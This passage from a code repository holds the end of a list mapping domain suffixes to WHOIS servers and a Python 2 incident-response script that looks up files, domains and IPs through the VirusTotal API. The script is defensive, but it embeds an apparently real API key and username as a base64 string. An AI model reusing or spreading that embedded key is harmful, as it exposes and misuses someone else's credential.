jll:whois.afilias-srs.net 1897 | jobs:whois.nic.jobs 1898 | joburg:joburg-whois.registry.net.za 1899 | jp:whois.jprs.jp 1900 | juegos:whois.uniregistry.net 1901 | juniper:whois.nic.juniper 1902 | kaufen:whois.unitedtld.com 1903 | kddi:whois.nic.kddi 1904 | ke:whois.kenic.or.ke 1905 | kerryhotels:whois.nic.kerryhotels 1906 | kerrylogistics:whois.nic.kerrylogistics 1907 | kerryproperties:whois.nic.kerryproperties 1908 | kfh:whois.nic.kfh 1909 | kg:whois.kg 1910 | ki:whois.nic.ki 1911 | kia:whois.nic.kia 1912 | kim:whois.afilias.net 1913 | kitchen:whois.donuts.co 1914 | kiwi:whois.nic.kiwi 1915 | kn:whois.nic.kn 1916 | koeln:whois-fe1.pdt.koeln.tango.knipp.de 1917 | komatsu:whois.nic.komatsu 1918 | kosher:whois.afilias-srs.net 1919 | kr:whois.kr 1920 | krd:whois.aridnrs.net.au 1921 | kuokgroup:whois.nic.kuokgroup 1922 | ky:whois.kyregistry.ky 1923 | kyoto:whois.nic.kyoto 1924 | kz:whois.nic.kz 1925 | la:whois.nic.la 1926 | lacaixa:whois.nic.lacaixa 1927 | ladbrokes:whois.nic.ladbrokes 1928 | lamborghini:whois.afilias-srs.net 1929 | lamer:whois.afilias-srs.net 1930 | lancaster:whois-lancaster.nic.fr 1931 | lancia:whois.afilias-srs.net 1932 | lancome:whois.nic.lancome 1933 | land:whois.donuts.co 1934 | landrover:whois.nic.landrover 1935 | lasalle:whois.afilias-srs.net 1936 | lat:whois.nic.lat 1937 | latino:whois.afilias-srs.net 1938 | latrobe:whois.nic.latrobe 1939 | law:whois.nic.law 1940 | lawyer:whois.rightside.co 1941 | lds:whois.afilias-srs.net 1942 | lease:whois.donuts.co 1943 | leclerc:whois-leclerc.nic.fr 1944 | lefrak:whois.nic.lefrak 1945 | legal:whois.donuts.co 1946 | lego:whois.nic.lego 1947 | lexus:whois.nic.lexus 1948 | lgbt:whois.afilias.net 1949 | li:whois.nic.li 1950 | liaison:whois.nic.liaison 1951 | lidl:whois.nic.lidl 1952 | life:whois.donuts.co 1953 | lifestyle:whois.nic.lifestyle 1954 | lighting:whois.donuts.co 1955 | limited:whois.donuts.co 1956 | limo:whois.donuts.co 1957 | linde:whois.nic.linde 1958 | link:whois.uniregistry.net 1959 | lipsy:whois.nic.lipsy 1960 | live:whois.rightside.co 1961 | lixil:whois.nic.lixil 1962 | loan:whois.nic.loan 1963 | loans:whois.donuts.co 1964 | locker:whois.afilias-srs.net 1965 | locus:whois.nic.locus 1966 | lol:whois.uniregistry.net 1967 | london:whois.nic.london 1968 | lotte:whois.nic.lotte 1969 | lotto:whois.afilias.net 1970 | love:whois.nic.love 1971 | lpl:whois.nic.lpl 1972 | lplfinancial:whois.nic.lplfinancial 1973 | lt:whois.domreg.lt 1974 | ltd:whois.donuts.co 1975 | ltda:whois.afilias-srs.net 1976 | lu:whois.dns.lu 1977 | lundbeck:whois.nic.lundbeck 1978 | luxe:whois.nic.luxe 1979 | luxury:whois.nic.luxury 1980 | lv:whois.nic.lv 1981 | ly:whois.nic.ly 1982 | ma:whois.registre.ma 1983 | macys:whois.nic.macys 1984 | madrid:whois.madrid.rs.corenic.net 1985 | maison:whois.donuts.co 1986 | makeup:whois.nic.makeup 1987 | man:whois.nic.man 1988 | management:whois.donuts.co 1989 | mango:whois.mango.coreregistry.net 1990 | market:whois.rightside.co 1991 | marketing:whois.donuts.co 1992 | markets:whois.nic.markets 1993 | marriott:whois.afilias-srs.net 1994 | maserati:whois.afilias-srs.net 1995 | mba:whois.donuts.co 1996 | mckinsey:whois.afilias-srs.net 1997 | md:whois.nic.md 1998 | me:whois.nic.me 1999 | med:whois.nic.med 2000 | media:whois.donuts.co 2001 | meet:whois.nic.google 2002 | melbourne:whois.aridnrs.net.au 2003 | meme:whois.nic.google 2004 | memorial:whois.donuts.co 2005 | men:whois.nic.men 2006 | menu:whois.nic.menu 2007 | metlife:whois.afilias-srs.net 2008 | mg:whois.nic.mg 2009 | miami:whois.nic.miami 2010 | mini:whois.ksregistry.net 2011 | mit:whois.afilias-srs.net 2012 | mitsubishi:whois.nic.gmo 2013 | mk:whois.marnet.mk 2014 | ml:whois.dot.ml 2015 | mls:whois.nic.mls 2016 | mma:whois-mma.nic.fr 2017 | mn:whois.nic.mn 2018 | mo:whois.monic.mo 2019 | mobi:whois.afilias.net 2020 | mobile:whois.afilias-srs.net 2021 | moda:whois.unitedtld.com 2022 | moe:whois.nic.moe 2023 | mom:whois.uniregistry.net 2024 | monash:whois.nic.monash 2025 | money:whois.donuts.co 2026 | monster:whois.afilias-srs.net 2027 | mopar:whois.afilias-srs.net 2028 | mormon:whois.afilias-srs.net 2029 | mortgage:whois.rightside.co 2030 | moscow:whois.nic.moscow 2031 | motorcycles:whois.afilias-srs.net 2032 | mov:whois.nic.google 2033 | movie:whois.donuts.co 2034 | movistar:whois-fe.movistar.tango.knipp.de 2035 | mp:whois.nic.mp 2036 | mq:whois.mediaserv.net 2037 | ms:whois.nic.ms 2038 | mtn:whois.nic.mtn 2039 | mtpc:whois.nic.gmo 2040 | mtr:whois.nic.mtr 2041 | mu:whois.nic.mu 2042 | museum:whois.museum 2043 | mx:whois.mx 2044 | my:whois.mynic.my 2045 | mz:whois.nic.mz 2046 | na:whois.na-nic.com.na 2047 | nab:whois.nic.nab 2048 | nadex:whois.nic.nadex 2049 | name:whois.nic.name 2050 | nationwide:whois.nic.nationwide 2051 | natura:whois.afilias-srs.net 2052 | navy:whois.rightside.co 2053 | nc:whois.nc 2054 | nec:whois.nic.nec 2055 | net:whois.verisign-grs.com 2056 | netbank:whois.nic.netbank 2057 | network:whois.donuts.co 2058 | new:whois.nic.google 2059 | newholland:whois.afilias-srs.net 2060 | news:whois.rightside.co 2061 | next:whois.nic.next 2062 | nextdirect:whois.nic.nextdirect 2063 | nexus:whois.nic.google 2064 | nf:whois.nic.nf 2065 | ng:whois.nic.net.ng 2066 | ngo:whois.publicinterestregistry.net 2067 | nico:whois.nic.nico 2068 | nikon:whois.nic.nikon 2069 | ninja:whois.unitedtld.com 2070 | nissan:whois.nic.gmo 2071 | nissay:whois.nic.nissay 2072 | nl:whois.domain-registry.nl 2073 | no:whois.norid.no 2074 | nokia:whois.afilias-srs.net 2075 | norton:whois.nic.norton 2076 | nowruz:whois.agitsys.net 2077 | nowtv:whois.afilias-srs.net 2078 | nra:whois.afilias-srs.net 2079 | nrw:whois.nic.nrw 2080 | nu:whois.iis.nu 2081 | nz:whois.srs.net.nz 2082 | obi:whois.nic.obi 2083 | observer:whois.nic.observer 2084 | off:whois.nic.off 2085 | olayan:whois.nic.olayan 2086 | olayangroup:whois.nic.olayangroup 2087 | ollo:whois.afilias-srs.net 2088 | om:whois.registry.om 2089 | omega:whois.nic.omega 2090 | one:whois.nic.one 2091 | ong:whois.publicinterestregistry.net 2092 | onl:whois.afilias-srs.net 2093 | online:whois.nic.online 2094 | onyourside:whois.nic.onyourside 2095 | ooo:whois.nic.ooo 2096 | oracle:whois.nic.oracle 2097 | orange:whois.nic.orange 2098 | org:whois.pir.org 2099 | organic:whois.afilias.net 2100 | orientexpress:whois.afilias-srs.net 2101 | origins:whois.afilias-srs.net 2102 | osaka:whois.nic.osaka 2103 | ott:whois.afilias-srs.net 2104 | ovh:whois-ovh.nic.fr 2105 | page:whois.nic.google 2106 | panasonic:whois.nic.gmo 2107 | paris:whois-paris.nic.fr 2108 | pars:whois.agitsys.net 2109 | partners:whois.donuts.co 2110 | parts:whois.donuts.co 2111 | party:whois.nic.party 2112 | pccw:whois.afilias-srs.net 2113 | pe:kero.yachay.pe 2114 | pet:whois.afilias.net 2115 | pf:whois.registry.pf 2116 | philips:whois.nic.philips 2117 | phone:whois.afilias-srs.net 2118 | photo:whois.uniregistry.net 2119 | photography:whois.donuts.co 2120 | photos:whois.donuts.co 2121 | physio:whois.nic.physio 2122 | pics:whois.uniregistry.net 2123 | pictures:whois.donuts.co 2124 | pid:whois.nic.pid 2125 | pink:whois.afilias.net 2126 | pioneer:whois.nic.gmo 2127 | pizza:whois.donuts.co 2128 | pl:whois.dns.pl 2129 | place:whois.donuts.co 2130 | play:whois.nic.google 2131 | playstation:whois.nic.playstation 2132 | plumbing:whois.donuts.co 2133 | plus:whois.donuts.co 2134 | pm:whois.nic.pm 2135 | pnc:whois.afilias-srs.net 2136 | pohl:whois.ksregistry.net 2137 | poker:whois.afilias.net 2138 | politie:whois.nic.politie 2139 | porn:whois.afilias-srs.net 2140 | post:whois.dotpostregistry.net 2141 | pr:whois.nic.pr 2142 | press:whois.nic.press 2143 | pro:whois.afilias.net 2144 | prod:whois.nic.google 2145 | productions:whois.donuts.co 2146 | prof:whois.nic.google 2147 | progressive:whois.afilias-srs.net 2148 | promo:whois.afilias.net 2149 | properties:whois.donuts.co 2150 | property:whois.uniregistry.net 2151 | protection:whois.nic.protection 2152 | pt:whois.dns.pt 2153 | pub:whois.unitedtld.com 2154 | pw:whois.nic.pw 2155 | pwc:whois.afilias-srs.net 2156 | qa:whois.registry.qa 2157 | quebec:whois.nic.quebec 2158 | quest:whois.nic.quest 2159 | racing:whois.nic.racing 2160 | radio:whois.nic.radio 2161 | raid:whois.nic.raid 2162 | re:whois.nic.re 2163 | realestate:whois.nic.realestate 2164 | realty:whois.nic.realty 2165 | recipes:whois.donuts.co 2166 | red:whois.afilias.net 2167 | redstone:whois.nic.redstone 2168 | redumbrella:whois.afilias-srs.net 2169 | rehab:whois.rightside.co 2170 | reise:whois.nic.reise 2171 | reisen:whois.donuts.co 2172 | reit:whois.nic.reit 2173 | reliance:whois.afilias-srs.net 2174 | rent:whois.nic.rent 2175 | rentals:whois.donuts.co 2176 | repair:whois.donuts.co 2177 | report:whois.donuts.co 2178 | republican:whois.rightside.co 2179 | rest:whois.nic.rest 2180 | restaurant:whois.donuts.co 2181 | review:whois.nic.review 2182 | reviews:whois.unitedtld.com 2183 | rexroth:whois.nic.rexroth 2184 | rich:whois.afilias-srs.net 2185 | richardli:whois.afilias-srs.net 2186 | ricoh:whois.nic.ricoh 2187 | rightathome:whois.nic.rightathome 2188 | ril:whois.afilias-srs.net 2189 | rio:whois.gtlds.nic.br 2190 | rip:whois.rightside.co 2191 | rmit:whois.aridnrs.net.au 2192 | ro:whois.rotld.ro 2193 | rocks:whois.unitedtld.com 2194 | rodeo:whois.nic.rodeo 2195 | rogers:whois.afilias-srs.net 2196 | rs:whois.rnids.rs 2197 | rsvp:whois.nic.google 2198 | ru:whois.tcinet.ru 2199 | rugby:whois.centralnic.com 2200 | ruhr:whois.nic.ruhr 2201 | run:whois.donuts.co 2202 | rwe:whois.nic.rwe 2203 | sa:whois.nic.net.sa 2204 | saarland:whois.ksregistry.net 2205 | sale:whois.rightside.co 2206 | salon:whois.donuts.co 2207 | samsclub:whois.nic.samsclub 2208 | samsung:whois.nic.samsung 2209 | sandvik:whois.nic.sandvik 2210 | sandvikcoromant:whois.nic.sandvikcoromant 2211 | sanofi:whois.nic.sanofi 2212 | sap:whois.nic.sap 2213 | sarl:whois.donuts.co 2214 | saxo:whois.aridnrs.net.au 2215 | sb:whois.nic.net.sb 2216 | sbi:whois.afilias-srs.net 2217 | sbs:whois.nic.sbs 2218 | sc:whois2.afilias-grs.net 2219 | sca:whois.nic.sca 2220 | scb:whois.nic.scb 2221 | schaeffler:whois.afilias-srs.net 2222 | schmidt:whois.nic.schmidt 2223 | scholarships:whois.afilias-srs.net 2224 | school:whois.donuts.co 2225 | schule:whois.donuts.co 2226 | schwarz:whois.nic.schwarz 2227 | science:whois.nic.science 2228 | scjohnson:whois.nic.scjohnson 2229 | scor:whois.nic.scor 2230 | scot:whois.scot.coreregistry.net 2231 | se:whois.iis.se 2232 | seat:whois.nic.seat 2233 | security:whois.nic.security 2234 | seek:whois.nic.seek 2235 | select:whois.nic.select 2236 | services:whois.donuts.co 2237 | ses:whois.nic.ses 2238 | seven:whois.nic.seven 2239 | sew:whois.afilias-srs.net 2240 | sex:whois.afilias-srs.net 2241 | sexy:whois.uniregistry.net 2242 | sfr:whois.nic.sfr 2243 | sg:whois.sgnic.sg 2244 | sh:whois.nic.sh 2245 | shangrila:whois.nic.shangrila 2246 | sharp:whois.nic.gmo 2247 | shaw:whois.afilias-srs.net 2248 | shell:whois.nic.shell 2249 | shia:whois.agitsys.net 2250 | shiksha:whois.afilias.net 2251 | shoes:whois.donuts.co 2252 | shopping:whois.donuts.co 2253 | shouji:whois.teleinfo.cn 2254 | show:whois.donuts.co 2255 | showtime:whois.afilias-srs.net 2256 | shriram:whois.afilias-srs.net 2257 | si:whois.register.si 2258 | sina:whois.afilias-srs.net 2259 | singles:whois.donuts.co 2260 | site:whois.nic.site 2261 | sk:whois.sk-nic.sk 2262 | ski:whois.afilias.net 2263 | skin:whois.nic.skin 2264 | sky:whois.nic.sky 2265 | sling:whois.afilias-srs.net 2266 | sm:whois.nic.sm 2267 | smart:whois-gtld.smart.com.ph 2268 | sn:whois.nic.sn 2269 | sncf:whois-sncf.nic.fr 2270 | so:whois.nic.so 2271 | soccer:whois.donuts.co 2272 | social:whois.unitedtld.com 2273 | softbank:whois.nic.softbank 2274 | software:whois.rightside.co 2275 | solar:whois.donuts.co 2276 | solutions:whois.donuts.co 2277 | sony:whois.nic.sony 2278 | soy:whois.nic.google 2279 | space:whois.nic.space 2280 | spiegel:whois.ksregistry.net 2281 | spreadbetting:whois.nic.spreadbetting 2282 | srl:whois.afilias-srs.net 2283 | srt:whois.afilias-srs.net 2284 | st:whois.nic.st 2285 | stada:whois.afilias-srs.net 2286 | star:whois.afilias-srs.net 2287 | starhub:whois.nic.starhub 2288 | statebank:whois.afilias-srs.net 2289 | statoil:whois.nic.statoil 2290 | stc:whois.nic.stc 2291 | stcgroup:whois.nic.stcgroup 2292 | stockholm:whois.afilias-srs.net 2293 | storage:whois.afilias-srs.net 2294 | store:whois.nic.store 2295 | studio:whois.rightside.co 2296 | study:whois.nic.study 2297 | style:whois.donuts.co 2298 | su:whois.tcinet.ru 2299 | sucks:whois.nic.sucks 2300 | supplies:whois.donuts.co 2301 | supply:whois.donuts.co 2302 | support:whois.donuts.co 2303 | surf:whois.nic.surf 2304 | surgery:whois.donuts.co 2305 | swatch:whois.nic.swatch 2306 | swiss:whois.nic.swiss 2307 | sx:whois.sx 2308 | sy:whois.tld.sy 2309 | sydney:whois.nic.sydney 2310 | symantec:whois.nic.symantec 2311 | systems:whois.donuts.co 2312 | tab:whois.nic.tab 2313 | taipei:whois.nic.taipei 2314 | tatamotors:whois.nic.tatamotors 2315 | tatar:whois.nic.tatar 2316 | tattoo:whois.uniregistry.net 2317 | tax:whois.donuts.co 2318 | taxi:whois.donuts.co 2319 | tc:whois.nic.tc 2320 | tci:whois.agitsys.net 2321 | tdk:whois.nic.tdk 2322 | team:whois.donuts.co 2323 | tech:whois.nic.tech 2324 | technology:whois.donuts.co 2325 | tel:whois.nic.tel 2326 | telecity:whois.nic.telecity 2327 | telefonica:whois-fe.telefonica.tango.knipp.de 2328 | temasek:whois.afilias-srs.net 2329 | tennis:whois.donuts.co 2330 | teva:whois.nic.teva 2331 | tf:whois.nic.tf 2332 | tg:whois.nic.tg 2333 | th:whois.thnic.co.th 2334 | thd:whois.afilias-srs.net 2335 | theater:whois.donuts.co 2336 | theatre:whois.nic.theatre 2337 | tiaa:whois.nic.tiaa 2338 | tickets:whois.nic.tickets 2339 | tienda:whois.donuts.co 2340 | tiffany:whois.nic.tiffany 2341 | tips:whois.donuts.co 2342 | tires:whois.donuts.co 2343 | tirol:whois.nic.tirol 2344 | tk:whois.dot.tk 2345 | tl:whois.nic.tl 2346 | tm:whois.nic.tm 2347 | tn:whois.ati.tn 2348 | to:whois.tonic.to 2349 | today:whois.donuts.co 2350 | tools:whois.donuts.co 2351 | top:whois.nic.top 2352 | toray:whois.nic.toray 2353 | toshiba:whois.nic.toshiba 2354 | total:whois-total.nic.fr 2355 | tours:whois.donuts.co 2356 | town:whois.donuts.co 2357 | toyota:whois.nic.toyota 2358 | toys:whois.donuts.co 2359 | tr:whois.nic.tr 2360 | trade:whois.nic.trade 2361 | trading:whois.nic.trading 2362 | training:whois.donuts.co 2363 | travel:whois.nic.travel 2364 | travelchannel:whois.nic.travelchannel 2365 | travelers:whois.afilias-srs.net 2366 | travelersinsurance:whois.afilias-srs.net 2367 | trust:whois.nic.trust 2368 | trv:whois.afilias-srs.net 2369 | tui:whois.ksregistry.net 2370 | tv:tvwhois.verisign-grs.com 2371 | tvs:whois.afilias-srs.net 2372 | tw:whois.twnic.net.tw 2373 | tz:whois.tznic.or.tz 2374 | ua:whois.ua 2375 | ubank:whois.nic.ubank 2376 | ubs:whois.nic.ubs 2377 | uconnect:whois.afilias-srs.net 2378 | ug:whois.co.ug 2379 | uk:whois.nic.uk 2380 | university:whois.donuts.co 2381 | uol:whois.gtlds.nic.br 2382 | ups:whois.afilias-srs.net 2383 | us:whois.nic.us 2384 | uy:whois.nic.org.uy 2385 | uz:whois.cctld.uz 2386 | vacations:whois.donuts.co 2387 | vana:whois.nic.vana 2388 | vanguard:whois.nic.vanguard 2389 | vc:whois2.afilias-grs.net 2390 | ve:whois.nic.ve 2391 | vegas:whois.afilias-srs.net 2392 | ventures:whois.donuts.co 2393 | verisign:whois.nic.verisign 2394 | vermögensberater:whois.ksregistry.net 2395 | vermögensberatung:whois.ksregistry.net 2396 | versicherung:whois.nic.versicherung 2397 | vet:whois.rightside.co 2398 | vg:whois.nic.vg 2399 | viajes:whois.donuts.co 2400 | video:whois.rightside.co 2401 | vig:whois.afilias-srs.net 2402 | viking:whois.afilias-srs.net 2403 | villas:whois.donuts.co 2404 | vin:whois.donuts.co 2405 | vip:whois.nic.vip 2406 | virgin:whois.nic.virgin 2407 | visa:whois.nic.visa 2408 | vision:whois.donuts.co 2409 | vista:whois.nic.vista 2410 | vistaprint:whois.nic.vistaprint 2411 | viva:whois.nic.viva 2412 | vlaanderen:whois.nic.vlaanderen 2413 | vodka:whois.nic.vodka 2414 | volkswagen:whois.afilias-srs.net 2415 | volvo:whois.nic.volvo 2416 | vote:whois.afilias.net 2417 | voting:whois.voting.tld-box.at 2418 | voto:whois.afilias.net 2419 | voyage:whois.donuts.co 2420 | vu:vunic.vu 2421 | wales:whois.nic.wales 2422 | walmart:whois.nic.walmart 2423 | walter:whois.nic.walter 2424 | wang:whois.gtld.knet.cn 2425 | warman:whois.nic.warman 2426 | watch:whois.donuts.co 2427 | webcam:whois.nic.webcam 2428 | weber:whois.nic.weber 2429 | website:whois.nic.website 2430 | wed:whois.nic.wed 2431 | wedding:whois.nic.wedding 2432 | weibo:whois.afilias-srs.net 2433 | wf:whois.nic.wf 2434 | whoswho:whois.nic.whoswho 2435 | wien:whois.nic.wien 2436 | wiki:whois.nic.wiki 2437 | win:whois.nic.win 2438 | wine:whois.donuts.co 2439 | wme:whois.nic.wme 2440 | wolterskluwer:whois.afilias-srs.net 2441 | woodside:whois.nic.woodside 2442 | work:whois.nic.work 2443 | works:whois.donuts.co 2444 | world:whois.donuts.co 2445 | ws:whois.website.ws 2446 | wtc:whois.nic.wtc 2447 | wtf:whois.donuts.co 2448 | xerox:whois.nic.xerox 2449 | xfinity:whois.nic.xfinity 2450 | xihuan:whois.teleinfo.cn 2451 | xin:whois.nic.xin 2452 | xperia:whois.nic.xperia 2453 | xxx:whois.nic.xxx 2454 | xyz:whois.nic.xyz 2455 | yachts:whois.afilias-srs.net 2456 | yodobashi:whois.nic.gmo 2457 | yoga:whois.nic.yoga 2458 | youtube:whois.nic.google 2459 | yt:whois.nic.yt 2460 | yun:whois.teleinfo.cn 2461 | zara:whois.afilias-srs.net 2462 | zip:whois.nic.google 2463 | zm:whois.nic.zm 2464 | zone:whois.donuts.co 2465 | zuerich:whois.ksregistry.net 2466 | бг:whois.imena.bg 2467 | бел:whois.cctld.by 2468 | дети:whois.nic.xn--d1acj3b 2469 | ею:whois.eu 2470 | католик:whois.aridnrs.net.au 2471 | ком:whois.nic.xn--j1aef 2472 | мкд:whois.marnet.mk 2473 | москва:whois.nic.xn--80adxhks 2474 | онлайн:whois.online.rs.corenic.net 2475 | орг:whois.publicinterestregistry.net 2476 | рус:whois.nic.xn--p1acf 2477 | рф:whois.tcinet.ru 2478 | сайт:whois.site.rs.corenic.net 2479 | срб:whois.rnids.rs 2480 | укр:whois.dotukr.com 2481 | қаз:whois.nic.kz 2482 | հայ:whois.amnic.net 2483 | कॉम:whois.nic.xn--11b4c3d 2484 | नेट:whois.nic.xn--c2br7g 2485 | संगठन:whois.publicinterestregistry.net 2486 | சிங்கப்பூர்:whois.sgnic.sg 2487 | คอม:whois.nic.xn--42c2d9a 2488 | ไทย:whois.thnic.co.th 2489 | გე:whois.itdc.ge 2490 | ‏.קום‎:whois.nic.xn--9dbq2a 2491 | ‏.ابوظبي‎:whois.nic.xn--mgbca7dzdo 2492 | ‏.الجزائر‎:whois.nic.dz 2493 | ‏.السعودية‎:whois.nic.net.sa 2494 | ‏.العليان‎:whois.nic.xn--mgba7c0bbn0a 2495 | ‏.امارات‎:whois.aeda.net.ae 2496 | ‏.ایران‎:whois.nic.ir 2497 | ‏.بازار‎:whois.bazaar.coreregistry.net 2498 | ‏.بيتك‎:whois.nic.xn--ngbe9e0a 2499 | ‏.سورية‎:whois.tld.sy 2500 | ‏.شبكة‎:whois.nic.xn--ngbc5azd 2501 | ‏.عراق‎:whois.cmc.iq 2502 | ‏.عمان‎:whois.registry.om 2503 | ‏.فلسطين‎:whois.pnina.ps 2504 | ‏.قطر‎:whois.registry.qa 2505 | ‏.كاثوليك‎:whois.aridnrs.net.au 2506 | ‏.كوم‎:whois.nic.xn--fhbei 2507 | ‏.مليسيا‎:whois.mynic.my 2508 | ‏.موقع‎:whois.afilias-srs.net 2509 | ‏.همراه‎:whois.agitsys.net 2510 | みんな:whois.nic.google 2511 | グーグル:whois.nic.google 2512 | コム:whois.nic.xn--tckwe 2513 | 中信:whois.gtld.knet.cn 2514 | 中国:cwhois.cnnic.cn 2515 | 中國:cwhois.cnnic.cn 2516 | 中文网:whois.teleinfo.cn 2517 | 企业:whois.donuts.co 2518 | 佛山:whois.ngtld.cn 2519 | 信息:whois.teleinfo.cn 2520 | 八卦:whois.nic.xn--45q11c 2521 | 公司:whois.ngtld.cn 2522 | 公益:whois.conac.cn 2523 | 台湾:whois.twnic.net.tw 2524 | 台灣:whois.twnic.net.tw 2525 | 商城:whois.gtld.knet.cn 2526 | 商店:whois.donuts.co 2527 | 嘉里:whois.nic.xn--w4rs40l 2528 | 嘉里大酒店:whois.nic.xn--w4r85el8fhu5dnra 2529 | 在线:whois.teleinfo.cn 2530 | 大众汽车:whois.afilias-srs.net 2531 | 大拿:whois.nic.xn--pssy2u 2532 | 天主教:whois.aridnrs.net.au 2533 | 娱乐:whois.donuts.co 2534 | 工行:whois.afilias-srs.net 2535 | 广东:whois.ngtld.cn 2536 | 微博:whois.afilias-srs.net 2537 | 慈善:whois.gtld.knet.cn 2538 | 我爱你:whois.gtld.knet.cn 2539 | 手机:whois.nic.xn--kput3i 2540 | 政务:whois.conac.cn 2541 | 政府:whois.nic.xn--mxtq1m 2542 | 新加坡:whois.sgnic.sg 2543 | 新闻:whois.nic.xn--efvy88h 2544 | 时尚:whois.gtld.knet.cn 2545 | 机构:whois.publicinterestregistry.net 2546 | 淡马锡:whois.afilias-srs.net 2547 | 游戏:whois.donuts.co 2548 | 澳門:whois.monic.mo 2549 | 点看:whois.nic.xn--3pxu8k 2550 | 移动:whois.afilias.net 2551 | 组织机构:whois.publicinterestregistry.net 2552 | 网址:whois.registry.knet.cn 2553 | 网店:whois.nic.xn--hxt814e 2554 | 网站:whois.afilias-srs.net 2555 | 网络:whois.ngtld.cn 2556 | 诺基亚:whois.afilias-srs.net 2557 | 谷歌:whois.nic.google 2558 | 集团:whois.gtld.knet.cn 2559 | 電訊盈科:whois.afilias-srs.net 2560 | 飞利浦:whois.nic.xn--kcrx77d1x4a 2561 | 香格里拉:whois.nic.xn--5su34j936bgsg 2562 | 香港:whois.hkirc.hk 2563 | 닷넷:whois.nic.xn--t60b56a 2564 | 닷컴:whois.nic.xn--mk1bu44c 2565 | 삼성:whois.kr 2566 | 한국:whois.kr 2567 | -------------------------------------------------------------------------------- /Emergency/Linux/virustotal.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf-8 -*- 2 | 3 | ''' 4 | 对于应急中需要查看的域名和IP地址进行威胁情报的查询 5 | ''' 6 | 7 | 8 | # 引入依赖的Py包、库、模块 9 | import os 10 | import sys 11 | import json 12 | import urllib 13 | import base64 14 | import urllib2 15 | import hashlib 16 | import datetime 17 | import postfile 18 | import simplejson 19 | from optparse import OptionParser 20 | 21 | 22 | # 配置APIKEY 23 | APIKEY = 'MDMzZTFhMmFlMDcxZjg4MDBkNTU4YTk2ODcxN2MyNjc0ZjhlYjcyOGNmYjZiNDcwZDQ3MTNkZDc0NDYwMGZiNytjaGVucmFu' 24 | 25 | # 定义VirusTotal类 26 | 27 | class virustotal(object): 28 | def __init__(self,username='chenran'): 29 | self._key = base64.b64decode(APIKEY).split('+')[0] 30 | self._username = base64.b64decode(APIKEY).split('+')[-1] 31 | self._host = "www.virustotal.com" 32 | self._fields = [("apikey",self._key)] 33 | if self._username != username: 34 | raise Exception("Wrong Username") 35 | 36 | def _upload_check_file(self,_file): 37 | _file = os.path.basename(_file) 38 | try: 39 | __file = open(_file,'rb').read() 40 | except Exception, reason: 41 | print "上传文件错误" 42 | return None 43 | _file_struct = [("file",_file,__file)] 44 | try: 45 | _json = postfile.post_multipart(self._host,"https://www.virustotal.com/vtapi/v2/file/scan",self._fields,_file_struct) 46 | except Exception, reason: 47 | print "获取文件报告错误" 48 | return None 49 | return _json 50 | 51 | def _file_rescan(self,_id): 52 | _string = '' 53 | if isinstance(_id,list): 54 | for sid in _id: 55 | _string += "%s,"%sid 56 | else: 57 | _string = '%s,'%str(_id) 58 | _string = _string[0:-1] 59 | _parameters = {"resource":_string,"apikey":self._key} 60 | try: 61 | data = urllib.urlencode(_parameters) 62 | _request = urllib2.Request("https://www.virustotal.com/vtapi/v2/file/rescan",data) 63 | _response = urllib2.urlopen(_request) 64 | _json = _response.read() 65 | except Exception, reason: 66 | return None 67 | return _json 68 | 69 | def _fast_check(self,_file): 70 | _md5 = hashlib.md5() 71 | _md5.update(open(_file,'rb').read()) 72 | _md5 = _md5.hexdigest() 73 | _json = self._upload_check_file(_file) 74 | if 'Error 400' in _json: 75 | _json = self._file_rescan(_md5) 76 | _json = simplejson.loads(_json) 77 | return _json["sha256"] 78 | 79 | 80 | def _upload_check_files(self,_file_list): 81 | _json_list = [] 82 | if len(_file_list) <= 0: 83 | return None 84 | for _file in _file_list: 85 | _json = self._fast_check(_file) 86 | _json_list.append(_json) 87 | return _json_list 88 | 89 | def _get_report(self,_sha256): 90 | _url = "https://www.virustotal.com/vtapi/v2/file/report" 91 | _parameters = {"resource":_sha256,"apikey":self._key} 92 | try: 93 | _data = urllib.urlencode(_parameters) 94 | _requset = urllib2.Request(_url,_data) 95 | _response = urllib2.urlopen(_requset) 96 | _json = _response.read() 97 | except Exception, reason: 98 | return None 99 | return _json 100 | 101 | def check_file(self,_hash=None,_file=None): 102 | if _file != None: 103 | self._fast_check(_file) 104 | _json = self._get_report(hashlib.sha256(open(_file,'rb').read()).hexdigest()) 105 | elif _hash != None: 106 | _json = self._get_report(_hash) 107 | else: 108 | return 0 109 | _json = json.loads(_json) 110 | #print _json 111 | #print _json["verbose_msg"] 112 | #print (u'Invalid' in str(_json["verbose_msg"])) 113 | if 'Invalid' not in _json["verbose_msg"]: 114 | positives = _json['positives'] 115 | else: 116 | positives = 0 117 | _list = [x for x in _json['scans'] if _json['scans'][x]['detected']] 118 | print "******************************************" 119 | print "检测时间: %s"%str(_json["scan_date"]) 120 | print "报毒数量: %s"%positives 121 | print "报毒引擎: %s"%str(_list) 122 | print "引擎总数: %s"%_json["total"] 123 | print "******************************************" 124 | 125 | def ioc_check(self,ioc,ioctype='domain'): 126 | if ioctype not in ['url','domain','ip']: 127 | print "类型不对,请检查" 128 | _parameters = {ioctype:ioc,'apikey':self._key} 129 | _dict = { 130 | "url":"https://www.virustotal.com/vtapi/v2/url/scan", 131 | "domain":"https://www.virustotal.com/vtapi/v2/domain/report", 132 | "ip":"https://www.virustotal.com/vtapi/v2/ip-address/report", 133 | } 134 | _url = _dict[ioctype] 135 | try: 136 | _response = urllib2.urlopen('%s?%s'%(_url,urllib.urlencode(_parameters))).read() 137 | _json = json.loads(_response) 138 | except Exception, reason: 139 | if ioctype == 'url': 140 | try: 141 | _data = urllib.urlencode(_parameters) 142 | _request = urllib2.Request(_url,_data) 143 | _response = urllib2.urlopen(_request) 144 | _json = _response.read() 145 | _json = json.loads(_json) 146 | keylist = [] 147 | samples = 0 148 | urls = 0 149 | try: 150 | resolv_domains = len(_json['resolutions']) 151 | except Exception, reason: 152 | resolv_domains = 0 153 | for key in _json.keys(): 154 | if 'detected' in key and 'undetected' not in key: 155 | keylist.append(key) 156 | for key in keylist: 157 | if 'samples' in key: 158 | for stuff in _json[key]: 159 | if stuff["positives"] > 0: 160 | samples += 1 161 | if 'urls' in key: 162 | for stuff in _json[key]: 163 | try: 164 | if stuff['positives'] > 0: 165 | urls += 1 166 | except Exception, reason: 167 | if int(stuff[2]) > 0: 168 | urls += 1 169 | print "******************************************" 170 | print "检测时间: %s"%str(datetime.datetime.now()).split(".")[0] 171 | print "关联样本: %s"%str(samples) 172 | print "关联连接: %s"%str(urls) 173 | print "关联域名: %s"%str(resolv_domains) 174 | print "******************************************" 175 | return None 176 | except Exception, reason: 177 | print reason 178 